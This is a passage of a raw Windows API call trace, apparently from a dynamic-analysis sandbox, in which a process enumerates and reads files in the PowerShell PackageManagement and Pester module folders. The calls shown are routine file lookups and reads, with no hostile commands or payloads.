hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0182.185] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0182.186] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0182.186] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0182.186] FindNextFileW (in: hFindFile=0x1a9b6780, lpFindFileData=0x1b7dd690 | out: lpFindFileData=0x1b7dd690*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.186] FindClose (in: hFindFile=0x1a9b6780 | out: hFindFile=0x1a9b6780) returned 1 [0182.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8f0) returned 1 [0182.186] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8b0) returned 1 [0182.186] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd530, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0182.186] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd590, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0182.186] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd9d0) returned 1 [0182.186] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddab0 | out: lpFileInformation=0x1b7ddab0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0182.187] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd990) returned 1 [0182.187] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dda00) returned 1 [0182.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", nBufferLength=0x105, lpBuffer=0x1b7dd4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1", lpFilePart=0x0) returned 0x44 [0182.187] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\", lpFilePart=0x0) returned 0x45 [0182.187] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\*", lpFindFileData=0x1b7dd6a0 | out: lpFindFileData=0x1b7dd6a0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6720 [0182.187] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xbd254645, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en", cAlternateFileName="")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.ArchiverProviders.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.CoreProviders.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31ae34d, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3de00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MetaProvider.PowerShell.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0182.188] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3b800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsiProvider.dll", cAlternateFileName="MID877~1.DLL")) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x9710091d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9710091d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PackageManagement.MsuProvider.dll", cAlternateFileName="MI0F1E~1.DLL")) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.PackageManagement.dll", cAlternateFileName="MI6305~1.DLL")) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13ad, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.format.ps1xml", cAlternateFileName="PACKAG~1.PS1")) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageManagement.psd1", cAlternateFileName="PACKAG~1.PSD")) returned 1 [0182.189] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 1 [0182.190] FindNextFileW (in: hFindFile=0x1a9b6720, lpFindFileData=0x1b7dd6f0 | out: lpFindFileData=0x1b7dd6f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e74, dwReserved0=0x0, dwReserved1=0x0, cFileName="PackageProviderFunctions.psm1", cAlternateFileName="PACKAG~1.PSM")) returned 0 [0182.190] FindClose (in: hFindFile=0x1a9b6720 | out: hFindFile=0x1a9b6720) returned 1 [0182.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd950) returned 1 [0182.190] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd910) returned 1 [0182.190] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psd1")) returned 0xffffffff [0182.190] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.psm1")) returned 0xffffffff [0182.190] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.cdxml")) returned 0xffffffff [0182.191] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.xaml")) returned 0xffffffff [0182.191] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\1.0.0.1.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\1.0.0.1.dll")) returned 0xffffffff [0182.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x1b7dd720, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0182.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb60) returned 1 [0182.191] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddc40 | out: lpFileInformation=0x1b7ddc40*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0182.191] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb20) returned 1 [0182.191] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb90) returned 1 [0182.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x105, lpBuffer=0x1b7dd680, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0182.191] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\", lpFilePart=0x0) returned 0x3d [0182.191] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x1b7dd830 | out: lpFindFileData=0x1b7dd830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a9b6900 [0182.191] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0182.192] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd254645, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd254645, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0182.192] FindNextFileW (in: hFindFile=0x1a9b6900, lpFindFileData=0x1b7dd880 | out: lpFindFileData=0x1b7dd880*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0182.192] FindClose (in: hFindFile=0x1a9b6900 | out: hFindFile=0x1a9b6900) returned 1 [0182.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddae0) returned 1 [0182.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddaa0) returned 1 [0182.192] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd790, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0182.192] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddbd0) returned 1 [0182.192] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7ddcb0 | out: lpFileInformation=0x1b7ddcb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31d459f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97126b74, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97126b74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5f8)) returned 1 [0182.192] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7ddb90) returned 1 [0182.193] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x105, lpBuffer=0x1b7dd490, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0182.193] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7dd970) returned 1 [0182.193] CreateFileW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x6cc [0182.193] GetFileType (hFile=0x6cc) returned 0x1 [0182.193] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7dd8e0) returned 1 [0182.193] GetFileType (hFile=0x6cc) returned 0x1 [0182.193] ReadFile (in: hFile=0x6cc, lpBuffer=0x218d118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x218d118*, lpNumberOfBytesRead=0x1b7dda48*=0x5f8, lpOverlapped=0x0) returned 1 [0182.193] ReadFile (in: hFile=0x6cc, lpBuffer=0x218c650, nNumberOfBytesToRead=0x208, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x218c650*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.193] ReadFile (in: hFile=0x6cc, lpBuffer=0x218d118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7dda48, lpOverlapped=0x0 | out: lpBuffer=0x218d118*, lpNumberOfBytesRead=0x1b7dda48*=0x0, lpOverlapped=0x0) returned 1 [0182.193] CloseHandle (hObject=0x6cc) returned 1 [0182.195] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0182.195] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0182.195] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0182.195] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0182.195] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0182.195] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7ddb30) returned 1 [0182.195] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x105, lpBuffer=0x1b7dd620, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0182.233] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\", nBufferLength=0x105, lpBuffer=0x1b7dd5c0, 